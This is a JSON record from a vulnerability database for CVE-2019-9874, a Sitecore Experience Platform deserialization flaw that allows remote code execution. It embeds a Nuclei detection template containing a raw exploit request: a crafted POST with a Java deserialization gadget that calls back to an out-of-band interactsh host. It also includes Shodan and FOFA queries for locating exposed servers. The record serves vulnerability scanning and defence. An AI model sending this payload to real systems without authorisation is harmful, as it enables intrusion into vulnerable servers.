{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2019-9874/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2019-9874/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2019-9874/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2019-9874/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2019-9874/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2019-9874"},"sightings":{"href":"/api/v1/sightings/cve-2019-9874"}},"enrichments":{"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2019/CVE-2019-9874.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2019-9874\n\ninfo:\n  name: Sitecore Experience Platform - Deserialization of Untrusted Data\n  author: ritikchaddha\n  severity: critical\n  description: |\n    Sitecore Experience Platform before 8.2 Update-7 and 9.0 before Update-2 is vulnerable to a remote code execution vulnerability (CVE-2019-9874). An attacker can exploit this issue to execute arbitrary code on the affected system via a crafted request to the /sitecore/shell/Applications/Layouts/IDE.aspx endpoint.\n  impact: |\n    Attackers can execute arbitrary code remotely, potentially leading to full system compromise.\n  remediation: |\n    Update to the latest version of Sitecore or apply security patches addressing deserialization issues.\n  reference:\n    - https://www.synacktiv.com/ressources/advisories/Sitecore_CSRF_deserialize_RCE.pdf\n    - https://nvd.nist.gov/vuln/detail/CVE-2019-9874\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2019-9874\n    epss-score: 0.83736\n    epss-percentile: 0.99677\n    cwe-id: CWE-502\n    cpe: cpe:2.3:a:sitecore:experience_platform:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: sitecore\n    product: experience_platform\n    shodan-query: http.html:\"SitecoSitecore Experience Platform\"\n    fofa-query: body=\"Sitecore Experience Platform\"\n  tags: cve,cve2019,sitecore,deserialization,rce,kev,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /sitecore/shell/Applications/Security/CreateNewUser/CreateNewUser.aspx HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n        Cookie: __CSRFCOOKIE={{randstr}};\n\n        __CSRFTOKEN={{generate_java_gadget(\"dns\", \"https://{{interactsh-url}}\", \"base64\")}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"PotentialCsrfException\"\n          - \"deserialization\"\n        condition: and\n        case-insensitive: true\n\n      - type: status\n        status:\n          - 500\n# digest: 490a0046304402206e50e7f470fd74747e137d3cfa7f6d87bdc1328379650aa929c0584c0476c95402202e9ab7c25ba8548815019ae661872701d43211a119a054c5294bca14940f4783:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2019-9874"}